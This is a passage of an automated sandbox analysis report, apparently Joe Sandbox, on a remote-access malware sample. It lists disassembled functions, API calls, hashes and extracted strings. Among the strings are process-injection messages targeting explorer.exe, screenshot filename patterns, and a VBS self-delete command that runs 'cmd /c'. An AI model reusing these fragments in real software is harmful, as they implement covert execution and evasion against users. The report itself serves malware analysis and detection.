                                                    • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00465900,00000000,00000000,00000000), ref: 0040A049
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                    • String ID: @CG$@CG$XCG$XCG$xAG$xAG
                                                    • API String ID: 3795512280-3163867910
                                                    • Opcode ID: 2ad637de4abed7bea4a9c298fd38dc88212808bad0aa3e762a0e0af5c839b2e2
                                                    • Instruction ID: 8be46055dc56f0d2ec4b071ca6400761e29966989419bbb2416efbd82a73718c
                                                    • Opcode Fuzzy Hash: 2ad637de4abed7bea4a9c298fd38dc88212808bad0aa3e762a0e0af5c839b2e2
                                                    • Instruction Fuzzy Hash: 06517C616043005ACB05BB71D866ABF769AAFD1309F00053FF886B71E2DF3DA945869A
                                                    Function 0045007D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • ___free_lconv_mon.LIBCMT ref: 004500C1
                                                      • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F310
                                                      • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F322
                                                      • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F334
                                                      • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F346
                                                      • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F358
                                                      • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F36A
                                                      • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F37C
                                                      • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F38E
                                                      • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3A0
                                                      • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3B2
                                                      • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3C4
                                                      • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3D6
                                                      • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3E8
                                                    • _free.LIBCMT ref: 004500B6
                                                      • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                      • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                    • _free.LIBCMT ref: 004500D8
                                                    • _free.LIBCMT ref: 004500ED
                                                    • _free.LIBCMT ref: 004500F8
                                                    • _free.LIBCMT ref: 0045011A
                                                    • _free.LIBCMT ref: 0045012D
                                                    • _free.LIBCMT ref: 0045013B
                                                    • _free.LIBCMT ref: 00450146
                                                    • _free.LIBCMT ref: 0045017E
                                                    • _free.LIBCMT ref: 00450185
                                                    • _free.LIBCMT ref: 004501A2
                                                    • _free.LIBCMT ref: 004501BA
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                    • String ID:
                                                    • API String ID: 161543041-0
                                                    • Opcode ID: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                    • Instruction ID: 71386be3831ae4e36ed8ba8c0666741f952bc44bbd11cc85bbb3aa2ad55dcdb0
                                                    • Opcode Fuzzy Hash: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                    • Instruction Fuzzy Hash: D5318135600B009FEB30AA39D845B5773E9EF02325F11842FE849E7692DF79AD88C719
                                                    Function 00419138 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 174sleeptimeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 0041913D
                                                    • GdiplusStartup.GDIPLUS(00473AF0,?,00000000), ref: 0041916F
                                                    • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 004191FB
                                                    • Sleep.KERNEL32(000003E8), ref: 0041927D
                                                    • GetLocalTime.KERNEL32(?), ref: 0041928C
                                                    • Sleep.KERNEL32(00000000,00000018,00000000), ref: 00419375
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                    • String ID: XCG$XCG$XCG$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                    • API String ID: 489098229-65789007
                                                    • Opcode ID: a5ca4fe806690e1fb78547f9ad46a3276a709212a97fd00fc62dd46e2bc7de04
                                                    • Instruction ID: 451d4021779863bb8065bd5e36f4a774b326d3833db1a6038cb7dac0f018a91b
                                                    • Opcode Fuzzy Hash: a5ca4fe806690e1fb78547f9ad46a3276a709212a97fd00fc62dd46e2bc7de04
                                                    • Instruction Fuzzy Hash: 56519071A002449ACB14BBB5D866AFE7BA9AB45304F00407FF849B71D2EF3C5D85C799
                                                    Function 0040428C Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 147networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • connect.WS2_32(?,?,?), ref: 004042A5
                                                    • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043CB
                                                    • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043D5
                                                    • WSAGetLastError.WS2_32(?,?,?,0040192B), ref: 004043E7
                                                      • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                    • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                    • API String ID: 994465650-2151626615
                                                    • Opcode ID: 0e18f61abc9e3d8a2747cabaf845d162c66a56537a1401371773013c123a1612
                                                    • Instruction ID: feeaa4dc0a5480c3be004408dd81f6e2390fe6c9429734df96c13844dfc6b1ca
                                                    • Opcode Fuzzy Hash: 0e18f61abc9e3d8a2747cabaf845d162c66a56537a1401371773013c123a1612
                                                    • Instruction Fuzzy Hash: 3E4116B1B002026BCB04B77A8C4B66E7A55AB81354B40016FE901676D3FE79AD6087DF
                                                    Function 0040C66D Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 147COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,?,0040C67D), ref: 004116A9
                                                      • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF,?,0040C67D), ref: 004116BC
                                                      • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00412679
                                                      • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 00412692
                                                      • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(?), ref: 0041269D
                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C6C7
                                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C826
                                                    • ExitProcess.KERNEL32 ref: 0040C832
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                    • String ID: """, 0$.vbs$@CG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                    • API String ID: 1913171305-390638927
                                                    • Opcode ID: cb2bafc17bd6d2fc7c2746a26f37568c25dfbde7b533674c545cbe9e54b8fc58
                                                    • Instruction ID: 3122975e65398275e0c1a8e950e5c558235310b29c64ef4ed93c25b66c9664dc
                                                    • Opcode Fuzzy Hash: cb2bafc17bd6d2fc7c2746a26f37568c25dfbde7b533674c545cbe9e54b8fc58
                                                    • Instruction Fuzzy Hash: A6414C329001185ACB14F761DC56DFE7779AF50718F50417FF906B30E2EE386A8ACA99
                                                    Function 0044F3F1 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _free
                                                    • String ID:
                                                    • API String ID: 269201875-0
                                                    • Opcode ID: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
                                                    • Instruction ID: d73775b2238990a9214358b8270f61d1b8324a28925b392a315ea9bfa7ac6158
                                                    • Opcode Fuzzy Hash: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
                                                    • Instruction Fuzzy Hash: 89C16672D40204AFEB20DBA8CC82FEF77F8AB05714F15446AFA44FB282D6749D458768
                                                    Function 00454992 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00454660: CreateFileW.KERNEL32(00000000,?,?,;JE,?,?,00000000,?,00454A3B,00000000,0000000C), ref: 0045467D
                                                    • GetLastError.KERNEL32 ref: 00454AA6
                                                    • __dosmaperr.LIBCMT ref: 00454AAD
                                                    • GetFileType.KERNEL32(00000000), ref: 00454AB9
                                                    • GetLastError.KERNEL32 ref: 00454AC3
                                                    • __dosmaperr.LIBCMT ref: 00454ACC
                                                    • CloseHandle.KERNEL32(00000000), ref: 00454AEC
                                                    • CloseHandle.KERNEL32(?), ref: 00454C36
                                                    • GetLastError.KERNEL32 ref: 00454C68
                                                    • __dosmaperr.LIBCMT ref: 00454C6F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                    • String ID: H
                                                    • API String ID: 4237864984-2852464175
                                                    • Opcode ID: b64a76ded07e6414476391b57ad8ab2edcfe93df9d200e18b46d3283e817940b
                                                    • Instruction ID: 2939135f81ce6efcdbf1290aa78a9ad6619f21b9340f77aa2193fadd435c2af6
                                                    • Opcode Fuzzy Hash: b64a76ded07e6414476391b57ad8ab2edcfe93df9d200e18b46d3283e817940b
                                                    • Instruction Fuzzy Hash: 9FA13732A041448FDF19DF68D8527AE7BA0EB46329F14015EFC019F392DB399C96C75A
                                                    Function 00452B3A Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 268COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,00452E13,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00452BE6
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,00452E13,00000000,00000000,?,00000001,?,?,?,?), ref: 00452C69
                                                    • __alloca_probe_16.LIBCMT ref: 00452CA1
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,00452E13,?,00452E13,00000000,00000000,?,00000001,?,?,?,?), ref: 00452CFC
                                                    • __alloca_probe_16.LIBCMT ref: 00452D4B
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00452E13,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D13
                                                      • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,00434433,?,?,00437237,?,?,00000000,00475B90,?,0040CC87,00434433,?,?,?,?), ref: 00446B41
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00452E13,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D8F
                                                    • __freea.LIBCMT ref: 00452DBA
                                                    • __freea.LIBCMT ref: 00452DC6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                    • String ID: Zb1Y/
                                                    • API String ID: 201697637-3232713500
                                                    • Opcode ID: 51fcd5d0f12c7252ccb3cdd53779652c124c35418bee1affee7c5fbc1305f75c
                                                    • Instruction ID: 924e7ddfc51c8ace49a4e982202af340d06b3b5a9b96f94d8290dca04e209d32
                                                    • Opcode Fuzzy Hash: 51fcd5d0f12c7252ccb3cdd53779652c124c35418bee1affee7c5fbc1305f75c
                                                    • Instruction Fuzzy Hash: E691C572E002169BDF218E64CA41AEF7BB5AF0A311F14456BEC01E7243D7ADDC49C7A8
                                                    Function 00413C67 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 155COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 65535$udp
                                                    • API String ID: 0-1267037602
                                                    • Opcode ID: ed3283d9ee94cadc099f5c83048f767ee72ed986ddea0764ae1f3250d10f5e6e
                                                    • Instruction ID: 18155c1335c00501c0bec8b6c43ed7e13bdec9a75575f631fadbade58ebc7fa9
                                                    • Opcode Fuzzy Hash: ed3283d9ee94cadc099f5c83048f767ee72ed986ddea0764ae1f3250d10f5e6e
                                                    • Instruction Fuzzy Hash: 5C411971604301ABD7209F29E9057AB77D8EF85706F04082FF84597391D76DCEC1866E
                                                    Function 0040C89E Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040CA04
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: LongNamePath
                                                    • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                    • API String ID: 82841172-425784914
                                                    • Opcode ID: 8a32bfeeafc5adc396a0c99bd34a7f668c86cb88242ad76930939258757ea5bd
                                                    • Instruction ID: a37aa742da7f535015bd00beacd4484d13b2c9c5bc690283ee024c69455bfc47
                                                    • Opcode Fuzzy Hash: 8a32bfeeafc5adc396a0c99bd34a7f668c86cb88242ad76930939258757ea5bd
                                                    • Instruction Fuzzy Hash: 68413A721442009AC214F721DD97DAFB7A4AE90759F10063FB546720E2FE7CAA49C69F
                                                    Function 00439371 Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393C9
                                                    • GetLastError.KERNEL32(?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393D6
                                                    • __dosmaperr.LIBCMT ref: 004393DD
                                                    • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439409
                                                    • GetLastError.KERNEL32(?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439413
                                                    • __dosmaperr.LIBCMT ref: 0043941A
                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401AD8,?), ref: 0043945D
                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439467
                                                    • __dosmaperr.LIBCMT ref: 0043946E
                                                    • _free.LIBCMT ref: 0043947A
                                                    • _free.LIBCMT ref: 00439481
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                    • String ID:
                                                    • API String ID: 2441525078-0
                                                    • Opcode ID: ab6d6df52fdda21e78bda597108ea35d8248e36eca260e6751756a241cd45372
                                                    • Instruction ID: 6a201652548b5938c51769f65cd316b483991bd1e06270b2389e89ad89b884a4
                                                    • Opcode Fuzzy Hash: ab6d6df52fdda21e78bda597108ea35d8248e36eca260e6751756a241cd45372
                                                    • Instruction Fuzzy Hash: AA31007280860ABFDF11AFA5DC45CAF3B78EF09364F10416AF81096291DB79CC11DBA9
                                                    Function 00449960 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 216COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042CE63,?,?,?,00449BB1,00000001,00000001,?), ref: 004499BA
                                                    • __alloca_probe_16.LIBCMT ref: 004499F2
                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042CE63,?,?,?,00449BB1,00000001,00000001,?), ref: 00449A40
                                                    • __alloca_probe_16.LIBCMT ref: 00449AD7
                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00449B3A
                                                    • __freea.LIBCMT ref: 00449B47
                                                      • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,00434433,?,?,00437237,?,?,00000000,00475B90,?,0040CC87,00434433,?,?,?,?), ref: 00446B41
                                                    • __freea.LIBCMT ref: 00449B50
                                                    • __freea.LIBCMT ref: 00449B75
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                    • String ID: Zb1Y/
                                                    • API String ID: 3864826663-3232713500
                                                    • Opcode ID: aa8dcda0c36fa9ba79fa8fe966d6c0ac5dcd12a00e8d66bfa7c578b9a9788745
                                                    • Instruction ID: 2fc013a73a1c4821613f4f7d6933c77eebbc764427e3f4eacb424f728eff0283
                                                    • Opcode Fuzzy Hash: aa8dcda0c36fa9ba79fa8fe966d6c0ac5dcd12a00e8d66bfa7c578b9a9788745
                                                    • Instruction Fuzzy Hash: 0951F772610256AFFB259F61DC42EBBB7A9EB44714F14462EFD04D7240EB38EC40E668
                                                    Function 00404E52 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetEvent.KERNEL32(?,?), ref: 00404E71
                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00404F21
                                                    • TranslateMessage.USER32(?), ref: 00404F30
                                                    • DispatchMessageA.USER32(?), ref: 00404F3B
                                                    • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00473F80), ref: 00404FF3
                                                    • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 0040502B
                                                      • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                    • String ID: CloseChat$DisplayMessage$GetMessage
                                                    • API String ID: 2956720200-749203953
                                                    • Opcode ID: a51964cc3bd14331006f3947e8af67d9827ab62082f85bb6a068cb08503db0d3
                                                    • Instruction ID: 321c3fbec734f1f8b9fff4e8d6f05c27936dabaea61c0bf38d797d3438e015d2
                                                    • Opcode Fuzzy Hash: a51964cc3bd14331006f3947e8af67d9827ab62082f85bb6a068cb08503db0d3
                                                    • Instruction Fuzzy Hash: F641BEB16043016BC614FB75D85A8AE77A8ABC1714F00093EF906A31E6EF38DA04C79A
                                                    Function 00455149 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 154COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00455DBF), ref: 0045516C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: DecodePointer
                                                    • String ID: Zb1Y/$acos$asin$exp$log$log10$pow$sqrt
                                                    • API String ID: 3527080286-939709183
                                                    • Opcode ID: 7f99e8985e511aa33529a80be55df7ea072d7a4d3ffec7ebceee198b32f2909e
                                                    • Instruction ID: dc575b74d0f085a316b11c585a5ec2812edae3f3668b4c4373b6e849a421fba0
                                                    • Opcode Fuzzy Hash: 7f99e8985e511aa33529a80be55df7ea072d7a4d3ffec7ebceee198b32f2909e
                                                    • Instruction Fuzzy Hash: F7517D70900A09CBCF149FA9E9581BDBBB0FB09342F244197EC45A7366DB7D8A188B1D
                                                    Function 00416E27 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 107filesynchronizationCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00465554), ref: 00416F24
                                                    • CloseHandle.KERNEL32(00000000), ref: 00416F2D
                                                    • DeleteFileA.KERNEL32(00000000), ref: 00416F3C
                                                    • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00416EF0
                                                      • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
                                                    • String ID: <$@$@FG$@FG$Temp
                                                    • API String ID: 1107811701-2245803885
                                                    • Opcode ID: c05d817a371b4f656e6dcacff060beea23bdfd3fcde92ea16948289ad15499fb
                                                    • Instruction ID: 31b483d39f6b5d6935d3c54cd29663daa4ef68f058b88688fc76c4b473729b01
                                                    • Opcode Fuzzy Hash: c05d817a371b4f656e6dcacff060beea23bdfd3fcde92ea16948289ad15499fb
                                                    • Instruction Fuzzy Hash: 3C318B319002099BCB04FBA1DC56AFE7775AF50308F00417EF906760E2EF785A8ACB99
                                                    Function 00406616 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 98COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32(00474A48,00000000,BG3i@,00003000,00000004,00000000,00000001), ref: 00406647
                                                    • GetCurrentProcess.KERNEL32(00474A48,00000000,00008000,?,00000000,00000001,00000000,004068BB,C:\Users\user\AppData\Roaming\eaJOpx.exe), ref: 00406705
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CurrentProcess
                                                    • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir$BG3i@
                                                    • API String ID: 2050909247-4145329354
                                                    • Opcode ID: 2c4cefaadf3906a4bff5f2a88e515bd7276069b26b3f954856ba32959abac89a
                                                    • Instruction ID: 85e9bb49d37c82d50cc0a876bfe2e9cbcca00efa80d213bdcfc81b1d75d5651e
                                                    • Opcode Fuzzy Hash: 2c4cefaadf3906a4bff5f2a88e515bd7276069b26b3f954856ba32959abac89a
                                                    • Instruction Fuzzy Hash: FF31CA75240300AFC310AB6DEC49F6A7768EB44705F11443EF50AA76E1EB7998508B6D
                                                    Function 00419C95 Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CA4
                                                    • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CBB
                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CC8
                                                    • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CD7
                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CE8
                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CEB
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Service$CloseHandle$Open$ControlManager
                                                    • String ID:
                                                    • API String ID: 221034970-0
                                                    • Opcode ID: 90cb661901cd042af288c915e3e3b558208b36f008bb68e694e16de296acffd5
                                                    • Instruction ID: 64b7f8b9d702139b787b45b2ac21df1fde646642379ff803e7b0347eb9faadae
                                                    • Opcode Fuzzy Hash: 90cb661901cd042af288c915e3e3b558208b36f008bb68e694e16de296acffd5
                                                    • Instruction Fuzzy Hash: 8711C631901218AFD7116B64EC85DFF3BECDB46BA1B000036F942921D1DB64CD46AAF5
                                                    Function 00446DDB Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _free.LIBCMT ref: 00446DEF
                                                      • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                      • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                    • _free.LIBCMT ref: 00446DFB
                                                    • _free.LIBCMT ref: 00446E06
                                                    • _free.LIBCMT ref: 00446E11
                                                    • _free.LIBCMT ref: 00446E1C
                                                    • _free.LIBCMT ref: 00446E27
                                                    • _free.LIBCMT ref: 00446E32
                                                    • _free.LIBCMT ref: 00446E3D
                                                    • _free.LIBCMT ref: 00446E48
                                                    • _free.LIBCMT ref: 00446E56
